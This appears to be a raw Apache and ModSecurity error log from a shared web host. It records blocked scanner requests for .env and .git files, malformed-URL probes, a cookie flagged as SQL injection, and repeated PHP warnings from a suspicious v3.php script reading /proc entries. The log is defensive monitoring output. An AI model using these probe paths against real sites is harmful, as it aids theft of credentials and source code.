[Tue May 12 05:00:42.778870 2026] [security2:error] [pid 1825287:tid 1825327] [client 43.130.37.243:53008] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/mphb_room_type_facility/42"] [unique_id "agKX2ggpmE1yW0glLdgkRwAAANU"]
[Tue May 12 05:00:43.819625 2026] [security2:error] [pid 1825287:tid 1825329] [client 147.135.214.95:57068] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/\\"%ssupport"] [unique_id "agKX2wgpmE1yW0glLdgkUgAAANc"]
[Tue May 12 05:00:57.138013 2026] [security2:error] [pid 1825287:tid 1825305] [client 102.165.0.222:56325] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKX6QgpmE1yW0glLdgkmQAAAME"], referer: https://www.piregwan-genesis.com/
[Tue May 12 05:01:04.078044 2026] [security2:error] [pid 1825179:tid 1825219] [client 129.226.213.145:44472] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKX8Nr1yOh9TvizeziV9QAAAFU"]
[Tue May 12 05:01:05.056621 2026] [security2:error] [pid 1730207:tid 1730220] [client 147.135.214.95:50582] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%s/\\""] [unique_id "agKX8Tue9Sp-pIv_Bb66RgAAAUs"]
[Tue May 12 05:01:06.584011 2026] [proxy_fcgi:error] [pid 1730207:tid 1730220] [client 147.135.214.95:50582] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:01:12.983805 2026] [security2:error] [pid 1730207:tid 1730220] [client 147.135.214.95:50582] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%1$s/\\""] [unique_id "agKX-Due9Sp-pIv_Bb66WAAAAUs"]
[Tue May 12 05:01:13.535414 2026] [security2:error] [pid 1808852:tid 1808860] [client 147.135.214.95:34240] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/\\"%ssupport"] [unique_id "agKX-RfeipD4uoG21FooCgAAAAU"]
PHP Warning:  filesize(): stat failed for /proc/44/task/44/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/44/task/44/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/44/task/44/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/44/task/44/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/44/task/44/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/44/task/44/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:01:14.479275 2026] [security2:error] [pid 1730207:tid 1730220] [client 147.135.214.95:50582] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%s/\\""] [unique_id "agKX-jue9Sp-pIv_Bb66YAAAAUs"]
[Tue May 12 05:01:17.935425 2026] [security2:error] [pid 1820198:tid 1820208] [client 114.119.146.220:41743] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: bd9df599b613df7738d398cbb0af5522||1778556675||1778556315"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/commander/"] [unique_id "agKX_c1tk6y7yBJLpJowsAAAAIg"]
[Tue May 12 05:01:17.935633 2026] [security2:error] [pid 1820198:tid 1820208] [client 114.119.146.220:41743] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/commander/"] [unique_id "agKX_c1tk6y7yBJLpJowsAAAAIg"]
[Tue May 12 05:01:18.565630 2026] [security2:error] [pid 1820198:tid 1820208] [client 114.119.146.220:41743] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKX_c1tk6y7yBJLpJowsAAAAIg"]
[Tue May 12 05:01:36.401739 2026] [security2:error] [pid 1808852:tid 1808858] [client 43.156.127.60:60522] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agKYEBfeipD4uoG21FooMgAAAAM"]
[Tue May 12 05:01:36.489313 2026] [security2:error] [pid 1730175:tid 1730198] [client 147.135.214.95:57060] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/plugins/\\"%s/\\""] [unique_id "agKYEHo6NvB9WXx5V-6ksAAAARU"]
[Tue May 12 05:01:38.048258 2026] [proxy_fcgi:error] [pid 1730175:tid 1730198] [client 147.135.214.95:57060] AH01071: Got error 'Primary script unknown'
[Tue May 12 05:01:38.578271 2026] [security2:error] [pid 1730207:tid 1730222] [client 176.65.139.232:44756] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKYEjue9Sp-pIv_Bb66jgAAAU0"]
[Tue May 12 05:01:38.578503 2026] [security2:error] [pid 1730207:tid 1730222] [client 176.65.139.232:44756] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKYEjue9Sp-pIv_Bb66jgAAAU0"]
[Tue May 12 05:01:38.578739 2026] [security2:error] [pid 1730207:tid 1730222] [client 176.65.139.232:44756] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKYEjue9Sp-pIv_Bb66jgAAAU0"]
[Tue May 12 05:01:39.853023 2026] [security2:error] [pid 1825179:tid 1825211] [client 43.156.127.60:40412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "jeanboyault.fr"] [uri "/"] [unique_id "agKYE9r1yOh9TvizeziWNAAAAE0"], referer: http://jeanboyault.fr
[Tue May 12 05:01:43.768302 2026] [:error] [pid 1825179:tid 1825201] [client 151.80.133.111:55852] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 05:01:44.075249 2026] [security2:error] [pid 1730175:tid 1730198] [client 147.135.214.95:57060] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%1$s/\\""] [unique_id "agKYGHo6NvB9WXx5V-6kxQAAARU"]
[Tue May 12 05:01:44.252530 2026] [:error] [pid 1730175:tid 1730182] [client 51.77.211.39:41912] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 05:01:45.561084 2026] [security2:error] [pid 1730175:tid 1730190] [client 43.156.127.60:48164] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agKYGXo6NvB9WXx5V-6kxwAAAQ0"], referer: https://jeanboyault.fr/
[Tue May 12 05:01:45.644383 2026] [security2:error] [pid 1730175:tid 1730198] [client 147.135.214.95:57060] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "211"] [id "920220"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "la-grande-fabrique.com"] [uri "/wp-content/languages/themes/\\"%s/\\""] [unique_id "agKYGXo6NvB9WXx5V-6kyAAAARU"]
[Tue May 12 05:01:45.920754 2026] [autoindex:error] [pid 1820198:tid 1820204] [client 98.86.232.58:47708] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:01:51.052056 2026] [:error] [pid 1825287:tid 1825322] [client 57.129.139.80:47244] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 05:01:52.364327 2026] [:error] [pid 1820198:tid 1820205] [client 57.129.69.7:50924] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 05:01:55.967362 2026] [ssl:error] [pid 1825287:tid 1825311] (EAI 2)Name or service not known: [client 34.141.230.59:2560] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:01:55.967406 2026] [ssl:error] [pid 1825287:tid 1825311] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174202/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174202/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174202/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174202/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174202/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174202/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:03:01.201979 2026] [:error] [pid 1808852:tid 1808855] [client 74.7.243.217:36516] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 05:03:09.291018 2026] [security2:error] [pid 1825287:tid 1825322] [client 43.157.95.131:58538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/nature/aquarium/"] [unique_id "agKYbQgpmE1yW0glLdglmQAAANE"]
[Tue May 12 05:03:23.413182 2026] [authz_core:error] [pid 1730175:tid 1730188] [client 47.128.58.240:57986] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/endpoints/error_log
PHP Warning:  filesize(): stat failed for /proc/43/task/43/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/43/task/43/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/43/task/43/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/43/task/43/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/43/task/43/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/43/task/43/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:04:01.713711 2026] [:error] [pid 1808852:tid 1808875] [client 74.7.243.217:58436] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:04:39.214194 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.42:27594] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKYxxfeipD4uoG21FopIgAAAA0"]
[Tue May 12 05:04:39.214369 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.42:27594] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKYxxfeipD4uoG21FopIgAAAA0"]
[Tue May 12 05:04:39.216536 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.42:27622] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKYx3o6NvB9WXx5V-6mIQAAAQE"]
[Tue May 12 05:04:39.216694 2026] [security2:error] [pid 1730175:tid 1730178] [client 45.148.10.42:27622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKYx3o6NvB9WXx5V-6mIQAAAQE"]
[Tue May 12 05:04:39.216689 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.42:27414] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agKYxwgpmE1yW0glLdgmjwAAAMQ"]
[Tue May 12 05:04:39.216821 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.42:27414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agKYxwgpmE1yW0glLdgmjwAAAMQ"]
[Tue May 12 05:04:39.218734 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.42:27440] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/index"] [unique_id "agKYxxfeipD4uoG21FopIwAAABY"]
[Tue May 12 05:04:39.218915 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.42:27440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/index"] [unique_id "agKYxxfeipD4uoG21FopIwAAABY"]
